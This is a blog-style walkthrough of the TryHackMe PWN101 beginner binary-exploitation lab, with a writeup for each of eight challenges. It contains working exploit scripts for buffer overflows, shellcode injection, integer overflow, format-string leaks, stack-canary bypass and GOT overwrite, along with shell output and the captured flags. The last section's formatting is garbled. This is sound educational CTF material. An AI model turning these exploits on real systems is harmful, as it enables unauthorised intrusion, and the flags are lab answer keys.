Post

TryHackMe PWN101

Posted Updated
By
10 min read

alt text #PWN101

Beginner-level binary exploitation challenges focus on learning basic vulnerabilities like buffer overflows, format string attacks, and return-to-libc, teaching how to manipulate memory and program flow to exploit compiled binaries.

##Challenge 1 - pwn101

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

void main(void)

{
  char local_48 [60];
  int local_c;
  
  local_c = 0x539;
  setup();
  banner();
  puts(
      "Hello!, I am going to shopping.\nMy mom told me to buy some ingredients.\nUmmm.. But I have l ow memory capacity, So I forgot most of them.\nAnyway, she is preparing Briyani for lunch, Can  you help me to buy those items :D\n"
      );
  puts("Type the required ingredients to make briyani: ");
  gets(local_48);
  if (local_c == 0x539) {
    puts("Nah bruh, you lied me :(\nShe did Tomato rice instead of briyani :/");
                    /* WARNING: Subroutine does not return */
    exit(0x539);
  }
  puts("Thanks, Here\'s a small gift for you <3");
  system("/bin/sh");
  return;
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

└─$ nc 10.10.195.11 9001
a       ┌┬┐┬─┐┬ ┬┬ ┬┌─┐┌─┐┬┌─┌┬┐┌─┐
        │ ├┬┘└┬┘├─┤├─┤│  ├┴┐│││├┤ 
        ┴ ┴└─ ┴ ┴ ┴┴ ┴└─┘┴ ┴┴ ┴└─┘
                 pwn 101          
a
Hello!, I am going to shopping.
My mom told me to buy some ingredients.
Ummm.. But I have low memory capacity, So I forgot most of them.
Anyway, she is preparing Briyani for lunch, Can you help me to buy those items :D

Type the required ingredients to make briyani: 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Thanks, Here's a small gift for you <3
cat flat.txt
ls
flag.txt
pwn101
pwn101.c
cat flag.txt
THM{7h4t's_4n_3flowwwww}

##Challenge 2 - pwn102

The buffer size is 104, its given in the code we have to rewrite local_c = 0xbadf00d; local_10 = -0x11e2153; these values

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

  import socket

ip='10.10.195.11'
port=9002
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))

payload = b'A' * 104
payload += b'\xd3\xc0\x00\x00'  # 0xc0d3 in little-endian
payload += b'\x33\xff\xc0\x00'  # 0xc0ff33 in little-endian
response = s.recv(1024)
print(response.decode('utf-8'))
s.send(payload + b'\n')


while True:
    # Wait for user input
    command = input("$ ")
    # Send the command to the remote server
    s.send(command.encode() + b'\n')
    # Receive and print the response
    response = s.recv(1024)
    print(response.decode('utf-8'))

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

└─$ python3 exploit.py
       ┌┬┐┬─┐┬ ┬┬ ┬┌─┐┌─┐┬┌─┌┬┐┌─┐
        │ ├┬┘└┬┘├─┤├─┤│  ├┴┐│││├┤ 
        ┴ ┴└─ ┴ ┴ ┴┴ ┴└─┘┴ ┴┴ ┴└─┘
                 pwn 102          

$ ls

I need badf00d to fee1dead
Am I right? Yes, I need c0ff33 to c0d3

$ ls
flag.txt
pwn102
pwn102.c

$ cat flag.txt
flag.txt
pwn102
pwn102.c

$ cat flag.txt
THM{y3s_1_n33D_C0ff33_to_C0d3_<3}

$

##Challenge 3 - pwn103

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

import socket
import struct

# Define the target IP and port
current_thmip = '10.10.195.11'
port = 9003

# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect to the remote server
s.connect((current_thmip, port))

# Prepare the payload
payload = b'A' * 40  # Fill the buffer to reach the return address
payload += struct.pack("<Q", 0x401016)  # Address of a 'ret' instruction for alignment
payload += struct.pack("<Q", 0x401554)  # Address of the admins_only function

# Clean any previous input
s.recv(1024)  # Read any existing data

# Send a menu selection to navigate to the desired function (3 in this case)
s.send(b'3\n')
s.recv(1024)  # Read response to ensure the menu is updated

# Send the payload
s.send(payload + b'\n')

# Read the response from the server
response = s.recv(1024)
print(response.decode('utf-8'))

# Enter interactive mode for further commands
while True:
    command = input("$ ")
    s.send(command.encode() + b'\n')
    response = s.recv(1024)
    print(response.decode('utf-8'))

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

┌──(kali㉿kali)-[~/Desktop/pwn101]
└─$ python3 exploit.py

🗣  General:

------[jopraveen]: Hello pwners 👋
------[jopraveen]: Hope you're doing well 😄
------[jopraveen]: You found the vuln, right? 🤔

------[pwner]: 
$ ls
Try harder!!! 💪

👮  Admins only:

Welcome admin 😄

$ ls
flag.txt
pwn103
pwn103.c

$ cat flag.txt
flag.txt
pwn103
pwn103.c

$ cat flag.txt
THM{w3lC0m3_4Dm1N}

$

##Challenge 4 - pwn104

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

from pwn import *

current_thmip = '10.10.181.112'
port = 9004

# Connect to the remote service
p = remote(current_thmip, port)


p.recvuntil(b'at ')
address = p.recvline().strip()  
bufferLocation = p64(int(address, 16))  
shellcode = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'

# Prepare the payload
payload = shellcode
payload += b'\x90' * (88 - len(shellcode))  # Add NOPs to fill up to 88 bytes
payload += bufferLocation  # Overwrite return address with the buffer's location

# Send the payload
p.sendline(payload)

# Interact with the shell
p.interactive

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

──(kali㉿kali)-[~/Desktop/pwn101]
└─$ python3 exploit.py
[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/kali/.cache/.pwntools-cache-3.11/update to 'never' (old way).
    Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
        [update]
        interval=never
[*] You have the latest version of Pwntools (4.13.1)
[+] Opening connection to 10.10.181.112 on port 9004: Done
[*] Switching to interactive mode
$ ls
flag.txt
pwn104
pwn104.c
$ cat flag.txt
THM{fake_n0o0o0o_h0w_Y0u_Won??}
$

##Challenge 5 - pwn105

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

from pwn import *

current_thmip = '10.10.181.112'
port = 9005

# Connect to the remote service
p = remote(current_thmip, port)

# Clean up any initial output
p.clean()

# Send the first input value
p.sendline(b'2147483647')

# Clean up any output after sending the first input
p.clean()

# Send the second input value
p.sendline(b'2147483647')

# Clean up any output after sending the second input
p.clean()

# Interact with the shell (or any further interaction)
p.interactive()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

┌──(kali㉿kali)-[~/Desktop/pwn101]
└─$ python3 exploit.py              
[+] Opening connection to 10.10.181.112 on port 9005: Done
[*] Switching to interactive mode
       ┌┬┐┬─┐┬ ┬┬ ┬┌─┐┌─┐┬┌─┌┬┐┌─┐
        │ ├┬┘└┬┘├─┤├─┤│  ├┴┐│││├┤ 
        ┴ ┴└─ ┴ ┴ ┴┴ ┴└─┘┴ ┴┴ ┴└─┘
                 pwn 105          


-------=[ BAD INTEGERS ]=-------
|-< Enter two numbers to add >-|

]>> ]>> 
[*] C: -2
[*] Popped Shell
[*] Switching to interactive mode
$ ls
flag.txt
pwn105
pwn105.c
$ cat flag.txt
THM{fake_b4D_1n73G3rsss}
$

##Challenge 6 - pwn106

1
2

current_thmip=10.10.134.184
(for i in {11..6..-1}; do echo %$i\$p | nc $current_thmip 9006; done) | grep Thanks | cut -c 8- | xxd -ps -r | rev

1
2
3

└─$ current_thmip=10.10.206.29 
(for i in {11..6..-1}; do echo %$i\$p | nc $current_thmip 9006; done) | grep Thanks | cut -c 8- | xxd -ps -r | rev
R_fl4G}s_1s_You_anD_th1Giv3AwaYw0n_th3_THM{y0U_

##Challenge 7 - pwn107

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

from pwn import *

elf = context.binary = ELF('./pwn107-1644307530397.pwn107')

current_thmip = '10.10.206.29'

# Connect to the remote server at the given IP and port
p = remote(current_thmip, 9007)
# For local testing, use the process() method
# p = process()

# Clean any initial output from the remote server
p.clean()

# Send format string payload to leak the stack address at position 10 (remote binary)
# and the stack canary at position 13
p.sendline(b'%10$p %13$p')  # Adjust according to remote binary offsets

# Receive and process the leaked addresses
p.recvuntil(b'streak: ')
leaked = p.recvline().split()
print(f"Leaked addresses: {leaked}")

# Calculate the base address of the binary using the leaked stack address
base = int(leaked[0], 16) - 0xa90  # Offset of 0xa90 from the base, adjust as needed
canary = int(leaked[1], 16)  # Stack canary value

# Set the base address in the ELF object to properly handle other symbol references
elf.address = base

# Construct the payload to overwrite the stack, bypassing the stack smashing protection
payload = b'A' * 24  # Padding to reach the canary, found via trial and error
payload += p64(canary)  # Place the canary back to avoid stack smashing detection
payload += b'A' * 8  # Padding between the canary and the return address
payload += p64(base + 0x6fe)  # Address of a 'ret' instruction (found via objdump)
payload += p64(elf.sym["get_streak"])  # Call the 'get_streak' function after the ret

# Clean the output before sending the final payload
p.clean()

# Send the crafted payload
p.sendline(payload)

# Interact with the service after sending the payload
p.interactive()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

└─$ python3 exploit.py

[*] '/home/kali/Desktop/pwn101/pwn107-1644307530397.pwn107'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No
[+] Opening connection to 10.10.206.29 on port 9007: Done
Leaked addresses: [b'0x559964e27a90', b'0x6d1fe82291506500']
[*] Switching to interactive mode
$ 
This your last streak back, don't do this mistake again
$ ls
flag.txt
pwn107
pwn107.c
$ cat flag.txt
THM{whY_i_us3d_pr1ntF()_w1thoUt_fmting??}
$

##Challenge 8 - pwn108 ```from pwn import *

Load the binary

elf = context.binary = ELF(‘./pwn108-1644300489260.pwn108’)

Set the target IP and port

current_thmip = ‘10.10.206.29’

Connect to the remote service at the given IP and port

p = remote(current_thmip, 9008)

For local testing, you can use process()

p = process()

Clean up any output before sending the payload

p.clean()

Send an initial newline to get the program to a state where we can interact with it

p.sendline()

Clean the response

p.clean()

We know from testing that the buffer starts at position 10, using a %n overwrite exploit.

We use pwntools’ fmtstr_payload function to craft the payload that overwrites the GOT entry for puts with the address of holidays.

payload = fmtstr_payload(10, {elf.got[‘puts’]: elf.sym[‘holidays’]})

Optionally, you can save the payload to a file for further analysis:

write(“pwn108payload.txt”, payload)

Send the crafted payload

p.sendline(payload)

Clean up the output before interacting

p.clean()

Switch to interactive mode to see the results of the payload execution

p.interactive()

1

└─$ python3 exploit.py [] ‘/home/kali/Desktop/pwn101/pwn108-1644300489260.pwn108’ Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) Stripped: No [+] Opening connection to 10.10.206.29 on port 9008: Done [] Switching to interactive mode ┌┬┐┬─┐┬ ┬┬ ┬┌─┐┌─┐┬┌─┌┬┐┌─┐ │ ├┬┘└┬┘├─┤├─┤│ ├┴┐│││├┤ ┴ ┴└─ ┴ ┴ ┴┴ ┴└─┘┴ ┴┴ ┴└─┘ pwn 108
  
1

  THM University 📚 👨‍🎓 Student login portal 👩‍🎓

=[Your name]: =[Your Reg No]: =[ STUDENT PROFILE ]= Name : \xe2\xff3\xff\x7fRegister no : \xe0 \xc0 \x00aaaabaa\x18@@Institue : THM No more exams for you enjoy your holidays 🎉 And here is a small gift for you $ ls flag.txt pwn108 pwn108.c $ cat flag.txt THM{7urN3dui_in70_win} $ ``` ##
  tryhackme ctf
 This post is licensed under  CC BY 4.0  by the author.
Trending Tags
 ctf tryhackme